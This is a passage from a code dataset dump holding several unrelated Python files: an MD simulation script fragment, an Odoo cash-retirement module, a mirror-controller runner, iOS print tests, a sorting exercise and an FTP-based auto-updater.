hoomd.dump.gsd(filename=backupname, overwrite=True, truncate=True, period=backupFreq, group=hoomd.group.all(), phase=0)\nif heavyTrajFreq>0:\n    hoomd.dump.gsd(filename='heavyTraj.gsd', overwrite=False, period=heavyTrajFreq, group=hoomd.group.all())\nif trajFreq>0:\n    hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=trajFreq, group=hoomd.group.all(),phase=0)\nelif trajFreq<0:\n    nt=-trajFreq\n    it=0\n    listat=tl.ListaLogaritmica(1, runSteps, nt, ints=True, addzero=True)\n    hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, 
period=None, group=hoomd.group.all(),phase=-1)\n print(\"listat:\", listat)\n nt=len(listat) #Since it's a logarithmic list of integers, it might end up having less elements than declare\n\n\n\n\n\nif thermostat == 'NVT' :\n print(runSteps,\" NVT steps with the Nose-Hoover thermostat at T=\",TemperatureGoal)\n integrator = md.integrate.nvt(group=hoomd.group.all(), kT=TemperatureGoal, tau=tauT)\n md.update.zero_momentum(period=10,phase=0)\n if trajFreq>=0:\n hoomd.run(runSteps, quiet=False)\n else:\n for it in range(nt-1):\n fewSteps=listat[it+1]-listat[it]\n hoomd.run(fewSteps, quiet=False)\n hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=None, group=hoomd.group.all(),phase=-1)\n it+=1\n\nelif thermostat == 'NVE' :\n print(runSteps,\" NVE steps with the NVE thermostat\")\n integrator = md.integrate.nve(group=hoomd.group.all())\n md.update.zero_momentum(period=10,phase=0)\n if trajFreq>=0:\n hoomd.run(runSteps, quiet=False)\n else:\n for it in range(nt-1):\n fewSteps=listat[it+1]-listat[it]\n hoomd.run(fewSteps, quiet=False)\n hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=None, group=hoomd.group.all(),phase=-1)\n it+=1\n\n\nelif thermostat == 'MB' :\n if trajFreq>=0:\n print(runSteps,\" NVT steps with the Andersen thermostat at T=\",TemperatureGoal)\n stepsTauT = int(tauT/dt)\n md.update.zero_momentum(period=10,phase=0)\n integrator = md.integrate.nve(group=hoomd.group.all())\n while(hoomd.get_step()\n\n\"\"\"Test with_memcache util decorator\"\"\"\n\nfrom unittest import TestCase\nimport mock\nfrom ddt import data, ddt, unpack\nfrom appengine import base\nfrom ggrc.cache.memcache import cached\n\n\n@ddt\n@base.with_memcache\nclass TestMemcacheDecorator(TestCase):\n \"\"\"Test decorator to emulate memcache in test\"\"\"\n\n TESTKEYS = ('1', '2', '3')\n\n # 2 test required for checking invalidation cache for each test case\n @data(TESTKEYS, TESTKEYS)\n @unpack\n def test_simple(self, *keys):\n \"\"\"Simple test\n\n add value in cache\n check it's invalidation on each test\"\"\"\n for key in keys:\n self.assertIsNone(self.memcache_client.get(key))\n val = key * 10\n self.memcache_client.add(key, val)\n self.assertEqual(val, self.memcache_client.get(key))\n\n def test_expire(self):\n \"\"\"Test decorator to emulate cache expire\"\"\"\n def test_func():\n pass\n cached_test_func = cached(test_func)\n cached_test_func.memcache_client.get = mock.Mock(side_effect=['1', None])\n self.assertEqual(cached_test_func(), '1')\n self.assertEqual(cached_test_func(), None)\n","sub_path":"test/unit/appengine/test_memcache_decorator.py","file_name":"test_memcache_decorator.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214466604","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\nfrom urllib.parse import urlencode\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass CashRetirement(models.Model):\n _name = \"cash.retirement\"\n _description = \"Cash retirement Request Form\"\n _inherit = [\"mail.thread\", \"mail.activity.mixin\"]\n _order = \"create_date DESC\"\n\n def _default_department(\n self,\n ): # this method is to search the hr.employee and return the user id of the person clicking the form atm\n user = (\n self.env[\"hr.employee\"]\n .sudo()\n .search([(\"user_id\", \"=\", self.env.uid)])\n )\n return user.department_id.id\n\n def _get_user(self):\n return self.env.uid\n\n def 
_default_employee(\n self,\n ): # this method is to search the hr.employee and return the user id of the person clicking the form atm\n return self.env[\"hr.employee\"].sudo().search([(\"user_id\", \"=\", self.env.uid)])\n\n @api.model\n def _default_currency(self):\n return self.env.user.company_id.currency_id\n\n def _get_default_account(self):\n \"\"\"Return the Receivable account of partner\"\"\"\n partner = self.env.user.partner_id\n receivable_account_id = partner.with_context(\n force_company=self.env.user.company_id.id).property_account_receivable_id\n if receivable_account_id:\n return receivable_account_id.id\n return False\n\n def _get_default_journal(self):\n \"\"\"Return the Receivable account of partner\"\"\"\n journal_id = self.env['ir.config_parameter'].sudo().get_param(\n 'sunray_cash_advance.advance_journal_id')\n return int(journal_id)\n\n def _get_company(self):\n return self.env.user.company_id\n\n name = fields.Char(\n string=\"Order Reference\",\n readonly=True,\n required=True,\n index=True,\n copy=False,\n default=\"/\",\n )\n note = fields.Char(\n string=\"Description\",\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n state = fields.Selection(\n [\n (\"draft\", \"New\"),\n (\"submit\", \"Submitted\"),\n (\"approve\", \"Approved\"),\n (\"close\", \"Closed\"),\n (\"reject\", \"Reject\"),\n ],\n string=\"Status\",\n readonly=False,\n index=True,\n copy=False,\n default=\"draft\",\n track_visibility=\"onchange\",\n )\n date = fields.Date(\n string=\"Date\",\n required=True,\n track_visibility=\"onchange\",\n default=date.today(),\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n employee_id = fields.Many2one(\n comodel_name=\"hr.employee\",\n required=True,\n string=\"Employee\",\n track_visibility=\"onchange\",\n default=_default_employee,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n manager_id = fields.Many2one(\n comodel_name=\"hr.employee\",\n string=\"Employee Manager\",\n compute=\"_get_employee_manager\",\n )\n department_id = fields.Many2one(\n comodel_name=\"hr.department\",\n string=\"Department\",\n related=\"employee_id.department_id\",\n )\n currency_id = fields.Many2one(\n comodel_name=\"res.currency\",\n required=True,\n string=\"Currency\",\n default=_default_currency,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n total_amount = fields.Float(\n string=\"Total amount\", compute=\"get_total_amount\", readonly=True\n )\n line_ids = fields.One2many(\n comodel_name=\"cash.retirement.line\",\n inverse_name=\"retirement_id\",\n string=\"Request Lines\",\n copy=True,\n )\n move_ids = fields.Many2many(\n comodel_name=\"account.move\", string=\"Accounting Entry\", readonly=True\n )\n journal_id = fields.Many2one(\n comodel_name=\"account.journal\", string=\"Journal\", default=_get_default_journal)\n advance_id = fields.Many2one(\n comodel_name=\"cash.advance\",\n string=\"Cash Advance\",\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n domain=\"[('user_id', '=', user_id), ('state', 'in', ('approve', 'post'))]\",\n )\n amount_advance = fields.Float(\n string=\"Advance Amount\", related=\"advance_id.total_amount\"\n )\n invoices_count = fields.Integer(\n string=\"Invoices\", compute=\"count_invoices\")\n user_id = fields.Many2one(\n comodel_name=\"res.users\",\n required=True,\n string=\"User\",\n default=_get_user,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n account_id = fields.Many2one(\n comodel_name=\"account.account\", 
string=\"Account\",\n default=_get_default_account\n )\n company_id = fields.Many2one(\n comodel_name=\"res.company\",\n string=\"Company\",\n default=_get_company,\n required=True,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n \n @api.model\n def create(self, values):\n values[\"name\"] = self.env['ir.sequence'].next_by_code(\"cash.retirement\")\n return super(CashRetirement, self).create(values)\n \n def _get_record_url(self):\n for record in self:\n base_url = self.env['ir.config_parameter'].sudo().get_param(\"web.base.url\")\n url = base_url\n params = {\n \"id\": record.id,\n \"action\": int(self.env.ref('sunray_cash_advance.action_cash_retirement')),\n \"model\": self._name,\n \"view_type\": \"form\",\n \"menu_id\": int(self.env.ref('hr_expense.menu_hr_expense_root')),\n }\n encoded_parameters = urlencode(params)\n if params:\n url = f\"{base_url}/web#{encoded_parameters}\"\n return url\n\n def _get_employee_manager(self):\n self.manager_id = (\n self.employee_id.parent_id\n and self.employee_id.parent_id.id\n or self.department_id.manager_id\n and self.department_id.manager_id.id\n or False\n )\n\n def count_invoices(self):\n self.invoices_count = len(self.move_ids.ids)\n\n def action_view_invoices(self):\n action = self.env.ref(\"account.action_move_journal_line\")\n result = action.read()[0]\n if len(self.move_ids) != 1:\n result[\"domain\"] = \"[('id', 'in', \" + str(self.move_ids.ids) + \")]\"\n elif len(self.move_ids) == 1:\n res = self.env.ref(\"account.view_move_form\", False)\n result[\"views\"] = [(res and res.id or False, \"form\")]\n result[\"res_id\"] = self.move_ids.id\n return result\n\n @api.multi\n def unlink(self):\n if any(self.filtered(lambda advance: advance.state not in [\"draft\"])):\n raise UserError(\n \"You can't delete a retirement that is not in draft state\"\n )\n res = super(CashRetirement, self).unlink()\n return res\n\n @api.onchange(\"advance_id\")\n def onchange_advance_id(self):\n if self.advance_id:\n self.line_ids.unlink()\n line_copy = [\n (\n 0,\n 0,\n {\n \"product_id\": line.product_id.id,\n \"name\": line.name,\n \"account_id\": line.product_id.property_account_expense_id.id,\n \"quantity\": line.quantity,\n \"price_unit\": line.price_unit,\n \"amount\": line.amount,\n \"analytic_account_id\": None\n },\n )\n for line in self.advance_id.line_ids\n ]\n return {\"value\": {\"line_ids\": line_copy}}\n\n @api.multi\n def submit(self):\n if not self.line_ids:\n return UserError(\"Please add lines!\")\n for line_no, line in enumerate(self.line_ids):\n if not line.analytic_account_id:\n raise ValidationError(\n f\"Please add an analytic (site code) account on Retirement line {line_no+1}!\")\n email_template = self.env.ref(\"sunray_cash_advance.retirement_submit\")\n email_template.with_context(url=self._get_record_url()).send_mail(self.id, True)\n self.write({\"state\": \"submit\"})\n return True\n\n def approve(self):\n # TODO: notify coo of this approval\n self.state = \"approve\"\n finance_users = self.env.ref('sunray_cash_advance.group_cash_advance_officer') and self.env.ref('sunray_cash_advance.group_cash_advance_officer').users\n coo_users = self.env.ref('sunray.coo_group') and self.env.ref('sunray.coo_group').users\n mail_template = self.env.ref(\"sunray_cash_advance.retirement_line_manager_approve_notify_finance\")\n finance_employees = self.env['hr.employee'].search([('user_id', 'in', finance_users.ids)])\n for recipient in finance_employees:\n mail_template.with_context(recipient=recipient, 
url=self._get_record_url()).send_mail(self.id, True)\n        mail_template = self.env.ref(\"sunray_cash_advance.retirement_line_manager_approve_notify_coo\")\n        coo_employees = self.env['hr.employee'].search([('user_id', 'in', coo_users.ids)])\n        for recipient in coo_employees:\n            mail_template.with_context(recipient=recipient, url=self._get_record_url()).send_mail(self.id, True)\n        return True\n\n    @api.multi\n    def button_reject(self):\n        self.write({\"state\": \"reject\"})\n        sender = self.env['hr.employee'].search([('user_id', '=', self.env.user.id)], limit=1)\n        mail_template = self.env.ref(\"sunray_cash_advance.retirment_reject\")\n        mail_template.with_context(recipient=sender, url=self._get_record_url()).send_mail(self.id, True)\n        return False\n\n    @api.multi\n    def set_to_draft(self):\n        self.write({\"state\": \"draft\"})\n\n    def get_total_amount(self):\n        for retirement in self:\n            total_amount = 0.0\n            for line in retirement.line_ids:\n                total_amount += line.amount\n            retirement.total_amount = total_amount\n\n    def post_entries(self):\n        if not self.journal_id:\n            raise UserError(\"Please specify a journal!\")\n        if not self.account_id:\n            raise UserError(\"Please specify a partner receivable account!\")\n        if any(not line.account_id for line in self.line_ids):\n            raise UserError(\"One or more products has no expense account!\")\n        requesting_partner = self.employee_id.user_id.partner_id\n        move_vals = {\n            \"ref\": self.name,\n            \"date\": date.today(),\n            \"journal_id\": self.journal_id.id,\n            \"amount\": self.total_amount,\n            \"line_ids\": [\n                (\n                    0,\n                    0,\n                    {  # Debit the expense account\n                        \"name\": line.product_id.name,\n                        \"debit\": line.amount,\n                        \"credit\": 0.0,\n                        \"account_id\": line.account_id.id,  # Debit employee receivable\n                        \"analytic_account_id\": line.analytic_account_id.id,\n                        \"date_maturity\": date.today(),\n                        \"partner_id\": self.employee_id.user_id.partner_id.id,\n                        \"description\": self.note,\n                    },\n                )\n                for line in self.line_ids\n            ]\n            + [\n                (\n                    0,\n                    0,\n                    {  # credit receivable account for employee\n                        \"name\": self.name,\n                        \"credit\": self.total_amount,\n                        \"debit\": 0.0,\n                        \"account_id\": self.account_id.id,\n                        \"date_maturity\": date.today(),\n                        \"partner_id\": self.employee_id.user_id.partner_id.id,\n                        \"description\": self.note,\n                    },\n                )\n            ],\n        }\n        intermediate_journal_id = self.env['account.journal'].browse(int(\n            self.env[\"ir.config_parameter\"].sudo().get_param(\"sunray_cash_advance.intermediate_bank_journal_id\")))\n        account_move = self.env[\"account.move\"].sudo().with_context(\n            company_id=self.env.user.company_id.id, currency_id=self.env.user.company_id.currency_id.id).create(move_vals)\n        self.move_ids.unlink()\n        self.move_ids += account_move\n        if self.advance_id.use_intermediate_account:\n            move_vals2 = {\n                \"ref\": self.name,\n                \"date\": date.today(),\n                \"journal_id\": int(self.env[\"ir.config_parameter\"].sudo().get_param(\"sunray_cash_advance.intermediate_bank_journal_id\")),\n                \"line_ids\": [(  # dr control/transit account\n                    0,\n                    0,\n                    {\n                        \"name\": self.name,\n                        \"debit\": self.total_amount,\n                        \"credit\": 0.0,\n                        \"account_id\": int(self.env[\"ir.config_parameter\"].sudo().get_param(\"sunray_cash_advance.control_account_id\")),\n                        \"date_maturity\": date.today(),\n                        \"partner_id\": requesting_partner.id,\n                        \"company_id\": requesting_partner.company_id.id,\n                        \"currency_id\": requesting_partner.currency_id.id,\n                        \"description\": self.note,\n                    },\n                ),\n                    (  # credit union bank\n                        0,\n                        0,\n                        {\n                            \"name\": self.name,\n                            \"credit\": self.total_amount,\n                            \"debit\": 0.0,\n                            \"account_id\": 
intermediate_journal_id.default_debit_account_id.id,\n \"date_maturity\": date.today(),\n \"partner_id\": requesting_partner.id,\n \"company_id\": requesting_partner.company_id.id,\n \"currency_id\": requesting_partner.currency_id.id,\n \"description\": self.note,\n },\n ),\n ],\n }\n account_move2 = self.env[\"account.move\"].sudo().with_context(\n company_id=self.env.user.company_id.id, currency_id=self.env.user.company_id.currency_id.id).create(move_vals2)\n self.move_ids += account_move2\n self.paid = True\n self.advance_id.state = \"close\"\n self.state = \"close\"\n return True\n\n\nclass CashRetirementLine(models.Model):\n _name = \"cash.retirement.line\"\n _description = \"retirement Lines\"\n\n retirement_id = fields.Many2one(\n comodel_name=\"cash.retirement\", string=\"retirement\"\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\", string=\"Product\"\n )\n name = fields.Char(string=\"Description\", required=True)\n account_id = fields.Many2one(\n comodel_name=\"account.account\", string=\"Account\", required=True\n )\n analytic_account_id = fields.Many2one(\n comodel_name=\"account.analytic.account\", string=\"Analytic Account\", required=True\n )\n quantity = fields.Integer(string=\"Quantity\", default=1)\n price_unit = fields.Float(string=\"Unit price\")\n amount = fields.Float(\n string=\"Amount\", required=True, compute=\"compute_amount\"\n )\n state = fields.Selection(string=\"State\", related=\"retirement_id.state\")\n\n @api.multi\n def compute_amount(self):\n for line in self:\n line.amount = line.price_unit * line.quantity\n\n @api.onchange(\"product_id\")\n def onchange_product_id(self):\n if self.product_id:\n return {\n \"value\": {\n \"name\": self.product_id.name,\n \"account_id\": self.product_id.property_account_expense_id.id,\n \"price_unit\": self.product_id.lst_price,\n }\n }\n","sub_path":"sunray_cash_advance/models/retirement.py","file_name":"retirement.py","file_ext":"py","file_size_in_byte":16191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"640331048","text":"\"\"\"\nGiven a binary array, sort it in non-decreasing order\n\nInput: First line contains an integer denoting the test cases 'T'. Every test case contains two lines, first line is size and second line is space separated elements of array\n\nOutput: Space separated elements of sorted arrays. 
There should be a new line between output of every test case.\n\n\nConstraints:\n1 <= Size of Array <= 1000\n10 <= Number of test cases <= 100\n\nExample:\n\nInput:\n2\n5\n1 0 1 1 0\n10\n1 0 1 1 1 1 1 0 0 0\n\nOutput:\n0 0 1 1 1\n0 0 0 0 1 1 1 1 1 1\n\"\"\"\n\nfrom itertools import chain\n\n\nif __name__ == '__main__':\n\n test_cases = int(input())\n\n for i in range(test_cases):\n _n = int(input())\n l = input().split()\n\n binary_sorted = chain(filter(lambda x: x == '0', l), filter(lambda x: x == '1', l))\n print(' '.join(list(binary_sorted)))\n","sub_path":"geeks_for_geeks/sorting/binary_array_sorting.py","file_name":"binary_array_sorting.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100290513","text":"import os\nimport time\nfrom plico.utils.base_runner import BaseRunner\nfrom plico.utils.logger import Logger\nfrom plico.utils.decorator import override\nfrom plico.utils.control_loop import FaultTolerantControlLoop\nfrom palpao_server.mirror_controller.simulated_deformable_mirror import \\\n SimulatedDeformableMirror\nfrom palpao_server.mirror_controller.deformable_mirror_controller import \\\n DeformableMirrorController\nfrom plico.rpc.zmq_ports import ZmqPorts\nfrom palpao.calibration.calibration_manager import CalibrationManager\nfrom palpao_server.mirror_controller.bmc_deformable_mirror import \\\n BmcDeformableMirror\nfrom palpao_server.mirror_controller.alpao_deformable_mirror import \\\n AlpaoDeformableMirror\nimport sys\n\n\n\nclass Runner(BaseRunner):\n\n RUNNING_MESSAGE = \"Mirror controller is running.\"\n\n def __init__(self):\n BaseRunner.__init__(self)\n\n\n def _tryGetDefaultFlatTag(self):\n try:\n mirrorDeviceSection= self.configuration.getValue(\n self.getConfigurationSection(), 'mirror')\n return self.configuration.getValue(\n mirrorDeviceSection, 'default_flat_tag')\n except KeyError as e:\n self._logger.warn(str(e))\n return None\n\n\n def _createDeformableMirrorDevice(self):\n mirrorDeviceSection= self.configuration.getValue(\n self.getConfigurationSection(), 'mirror')\n mirrorModel= self.configuration.deviceModel(mirrorDeviceSection)\n if mirrorModel == 'simulatedMEMSMultiDM':\n self._createSimulatedDeformableMirror(mirrorDeviceSection)\n elif mirrorModel == 'simulatedDM':\n self._createSimulatedDeformableMirror(mirrorDeviceSection)\n elif mirrorModel == 'alpaoDM':\n self._createAlpaoMirror(mirrorDeviceSection)\n elif mirrorModel == 'piTipTilt':\n self._createPITipTiltMirror(mirrorDeviceSection)\n elif mirrorModel == 'bmc':\n self._createBmcDeformableMirror(mirrorDeviceSection)\n else:\n raise KeyError('Unsupported mirror model %s' % mirrorModel)\n\n\n def _createSimulatedDeformableMirror(self, mirrorDeviceSection):\n dmSerialNumber= self.configuration.getValue(\n mirrorDeviceSection, 'serial_number')\n self._mirror= SimulatedDeformableMirror(dmSerialNumber)\n\n\n def _createAlpaoMirror(self, mirrorDeviceSection):\n serialNumber= str(self.configuration.getValue(mirrorDeviceSection,\n 'serial_number'))\n self._logger.notice(\"Creating ALPAO device SN %s\" % serialNumber)\n libFolder= self.configuration.getValue(mirrorDeviceSection,\n 'lib_folder')\n sys.path.append(libFolder)\n from asdk import DM\n alpaoDm= DM(serialNumber)\n self._mirror= AlpaoDeformableMirror(alpaoDm, serialNumber)\n self._logger.notice(\"ALPAO device SN %s created\" % serialNumber)\n\n\n def _createBmcDeformableMirror(self, mirrorDeviceSection):\n serialNumber= 
self.configuration.getValue(mirrorDeviceSection,\n 'serial_number')\n self._logger.notice(\"Creating BMC device SN %s\" % serialNumber)\n import bmc\n bmcDm= bmc.BmcDm()\n self._logger.notice(\"BMC version <%s>\" % bmcDm.version_string())\n self._mirror= BmcDeformableMirror(bmcDm, serialNumber)\n\n\n def _createPITipTiltMirror(self, mirrorDeviceSection):\n from palpao_server.mirror_controller.pi_tip_tilt_mirror \\\n import PhysikInstrumenteTipTiltMirror\n from pi_gcs.gcs2 import GeneralCommandSet2\n from pi_gcs.tip_tilt_2_axes import TipTilt2Axis\n\n hostname= self.configuration.getValue(\n mirrorDeviceSection, 'ip_address')\n serialNumber= self.configuration.getValue(mirrorDeviceSection,\n 'serial_number')\n cfg= self._calibrationManager.loadPiTipTiltCalibration(\n serialNumber)\n cfg.hostname= hostname\n gcs=GeneralCommandSet2()\n tt=TipTilt2Axis(gcs, cfg)\n tt.setUp()\n self._mirror= PhysikInstrumenteTipTiltMirror(\n serialNumber, tt)\n\n\n def _createCalibrationManager(self):\n calibrationRootDir= self.configuration.calibrationRootDir()\n self._calibrationManager= CalibrationManager(calibrationRootDir)\n\n\n def _setUp(self):\n self._logger= Logger.of(\"Deformable Mirror Controller runner\")\n\n self._zmqPorts= ZmqPorts.fromConfiguration(\n self.configuration, self.getConfigurationSection())\n self._replySocket = self.rpc().replySocket(\n self._zmqPorts.SERVER_REPLY_PORT)\n self._statusSocket = self.rpc().publisherSocket(\n self._zmqPorts.SERVER_STATUS_PORT)\n\n self._logger.notice('reply socket on port %d' %\n self._zmqPorts.SERVER_REPLY_PORT)\n self._logger.notice('status socket on port %d' %\n self._zmqPorts.SERVER_STATUS_PORT)\n\n self._createCalibrationManager()\n\n self._createDeformableMirrorDevice()\n\n flatFileTag= self._tryGetDefaultFlatTag()\n\n self._logger.notice(\"Creating DeformableMirrorController\")\n self._controller= DeformableMirrorController(\n self.name,\n self._zmqPorts,\n self._mirror,\n self._replySocket,\n self._statusSocket,\n self.rpc(),\n self._calibrationManager,\n flatFileTag)\n\n\n def _runLoop(self):\n self._logRunning()\n\n FaultTolerantControlLoop(\n self._controller,\n Logger.of(\"Deformable Mirror Controller control loop\"),\n time,\n 0.001).start()\n self._logger.notice(\"Terminated\")\n\n\n @override\n def run(self):\n self._setUp()\n self._runLoop()\n return os.EX_OK\n\n\n @override\n def terminate(self, signal, frame):\n self._controller.terminate()\n","sub_path":"palpao_server/mirror_controller/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16136410","text":"import pytest\n\nfrom MobileApps.libs.flows.ios.smart.flow_container import FlowContainer\nfrom MobileApps.resources.const.ios.const import *\n\npytest.app_info = \"SMART\"\n\nclass Test_Suite_10_Printing_File_Formats(object):\n @pytest.fixture(scope=\"class\", autouse=\"true\")\n def class_setup(cls, request, session_setup, load_printers_session):\n cls = cls.__class__\n cls.driver = session_setup\n cls.fc = FlowContainer(cls.driver)\n cls.p = load_printers_session\n cls.home = cls.fc.fd[\"home\"]\n cls.preview = cls.fc.fd[\"preview\"]\n cls.sys_config = ma_misc.load_system_config_file()\n cls.stack = request.config.getoption(\"--stack\")\n cls.file_name = \"4pages\"\n cls.fc.go_home(stack=cls.stack)\n cls.fc.add_printer_by_ip(cls.p.get_printer_information()[\"ip address\"])\n \n 
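# Note: pytest passes the test-class instance as the first argument of a fixture\n    # defined inside a class, so the 'cls = cls.__class__' line above rebinds it to\n    # the class itself; attributes assigned here (driver, fc, p, ...) are then shared\n    # by every test in the class. autouse=\"true\" only works because a non-empty\n    # string is truthy; autouse=True is the conventional spelling.\n    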
@pytest.mark.parametrize(\"document_format\",[\"pdf\",\"txt\",\"docx\",\"xlsx\"])\n def test_01_verify_printing_different_document_formats(self, document_format):\n \"\"\"\n C27655278 - PDF\n C27655279 - TXT\n C27655280 - DOC\n C27655282 - XLS\n \"\"\" \n self.fc.navigate_to_google_drive_in_files()\n self.fc.select_file_in_google_drive(file_type=document_format, file_name=self.file_name)\n self.preview.verify_preview_screen()\n self.fc.fd[\"preview\"].dismiss_print_preview_coach_mark()\n self.fc.select_print_button_and_verify_print_job(self.p)\n \n @pytest.mark.parametrize(\"image_format\",[\"jpg\",\"png\",\"bmp\",\"tif\"])\n def test_02_verify_printing_different_image_formats(self, image_format):\n \"\"\"\n C27655274 - JPG\n C27655275 - PNG\n C27655276 - BMP\n C27655277 - TIFF\n \"\"\"\n if image_format == \"jpg\":\n file_name = \"fish\"\n elif image_format == \"png\":\n file_name = \"pikachu\"\n elif image_format == \"tif\":\n file_name = \"green_automation\"\n elif image_format == \"bmp\":\n file_name = \"test_bmp\"\n else:\n file_name = \"motorbike\"\n self.fc.navigate_to_google_drive_in_files()\n self.fc.select_file_in_google_drive(file_type=image_format, file_name=file_name)\n self.preview.verify_preview_screen()\n self.fc.fd[\"preview\"].dismiss_print_preview_coach_mark()\n self.fc.select_print_button_and_verify_print_job(self.p)","sub_path":"tests/ios/smart/functionality/printing/test_suite_10_prinitng_file_formats.py","file_name":"test_suite_10_prinitng_file_formats.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"413404563","text":"#! /usr/bin/python3\r\n# ! coding: utf-8\r\n\r\nimport ftplib\r\nimport logging\r\nimport logging.handlers\r\nimport os\r\nimport shutil\r\nimport zipfile\r\nfrom subprocess import Popen, PIPE\r\nfrom xml.dom import minidom\r\nimport requests\r\nimport check_flash_card_connection\r\nimport handling_logs\r\nimport handling_settings\r\nimport argparse\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom progressbar import *\r\n\r\nparameters_file = 'Settings.ini'\r\ntmp_catalog_for_install_updates = \"{}/for_installation\".format(os.getcwd())\r\npath_to_install_CU = '/home/cblock/'\r\npath_for_this_script = os.getcwd()\r\nsystem_path_media = \"/media/cashier\"\r\nversion = 'ver:1.03(04.12.2019)'\r\nnow_time = time.strftime('%H-%M-%S')\r\ntime_upload_log = time.strftime('%d-%m-%y')\r\nnow_date = time.strftime('%d-%m-%y')\r\nglobal_log = 'Log/Auto-update{}.log'.format(now_date)\r\nif not os.path.exists('Log'):\r\n os.mkdir('Log')\r\n\r\nhistory_log = \"/home/cashier/scripts/Admin_updater/Log/history.log\"\r\nif not os.path.exists(history_log):\r\n os.system('touch {}'.format(history_log))\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.INFO)\r\nlog_file = logging.FileHandler(global_log)\r\nlog_file.setLevel(logging.INFO)\r\nlog_file.setFormatter(logging.Formatter(u'[LINE:%(lineno)d]# %(levelname)-8s[%(asctime)s] %(message)s'))\r\nlog_console = logging.StreamHandler()\r\nlog_console.setLevel(logging.ERROR)\r\nlogger.addHandler(log_console)\r\nlogger.addHandler(log_file)\r\n\r\n\r\ndef parser():\r\n pars = argparse.ArgumentParser()\r\n pars.add_argument('-u', '--update', type=str, default=None, help='Введите имя обновления, пример: -u upd0001')\r\n pars.add_argument('-l', '--list', action='store_true', help='Выводит список доступных обновлений на сервере')\r\n pars.add_argument('-w', '--window', 
action='store_true', help='Открывает оконный интерфейс')\r\n pars.add_argument('-s', '--start_user', action='store_true', help='Запуск пользователем из меню')\r\n pars.add_argument('-v', '--version', action='store_true', help='Версия: {}'.format(version))\r\n\r\n return pars\r\n\r\n\r\nkey_parser = parser()\r\nnamespace = key_parser.parse_args()\r\n\r\n\r\nclass FtpClient:\r\n\r\n def __init__(self, ftp_path, connect_ftp=None):\r\n try:\r\n self.ftp_path = ftp_path\r\n self.connect_ftp = connect_ftp\r\n self.key_ftp_host = parameters_ini.get('Global', 'ftp_host')\r\n self.key_ftp_user = parameters_ini.get('Global', 'ftp_user')\r\n self.ftp_pass = parameters_ini.get('Global', 'ftp_pass')\r\n connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass, timeout=10)\r\n connect_ftp.encoding = 'UTF-8'\r\n connect_ftp.cwd(ftp_path)\r\n self.path_list = connect_ftp.nlst()\r\n connect_ftp.close()\r\n except Exception as all_error:\r\n logger.exception(\"Error connect FTP\\n {}\".format(all_error))\r\n\r\n def download_upd(self, name, ini=False):\r\n \"\"\" This function connect to FTP and download update \"\"\"\r\n try:\r\n if not ini:\r\n os.chdir(tmp_catalog_for_install_updates)\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.encoding = 'UTF-8'\r\n self.connect_ftp.cwd(self.ftp_path)\r\n if not ini:\r\n name = \"{}.zip\".format(name)\r\n with open(\"{}\".format(name), 'wb') as upd_file:\r\n response = self.connect_ftp.retrbinary('RETR ' + \"{}\".format(name), upd_file.write)\r\n self.connect_ftp.close()\r\n if not response.startswith(\"226\"):\r\n logger.info('Error\\n: {}'.format(response))\r\n else:\r\n logger.info('Download : {}'.format(name))\r\n os.chdir(path_for_this_script)\r\n except ftplib.all_errors as ftp_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(ftp_error))\r\n raise ConnectionError\r\n except Exception as all_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(all_error))\r\n raise ConnectionError\r\n\r\n def upload_log(self, name):\r\n \"\"\" This function connect to FTP and upload log-file \"\"\"\r\n ftp_log_path = parameters_ini.get('Global', 'ftp_path_logs')\r\n log_name = name.split('/')[-1]\r\n local_path_log = \"/home/cashier/scripts/Admin_updater/Log/{}\".format(log_name)\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.cwd(\"{}/{}\".format(ftp_log_path, log_name.split('.')[0]))\r\n if os.path.exists(local_path_log):\r\n new_name = \"({})({})({}).log\".format(system_name, log_name.split('.')[0], time_upload_log)\r\n shutil.copy(local_path_log, new_name)\r\n try:\r\n with open(new_name, 'rb') as file:\r\n response_upload_log = self.connect_ftp.storlines(\"STOR \" + new_name, file)\r\n file.close()\r\n if not response_upload_log.startswith(\"226 Transfer complete\"):\r\n with open(new_name, 'rb') as file:\r\n self.connect_ftp.storlines(\"STOR \" + new_name, file)\r\n file.close()\r\n except ftplib.all_errors as ftp_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(ftp_error))\r\n raise ConnectionError\r\n except Exception as all_error:\r\n logger.exception('Error Upload log: {}'.format(all_error))\r\n raise ConnectionError\r\n finally:\r\n 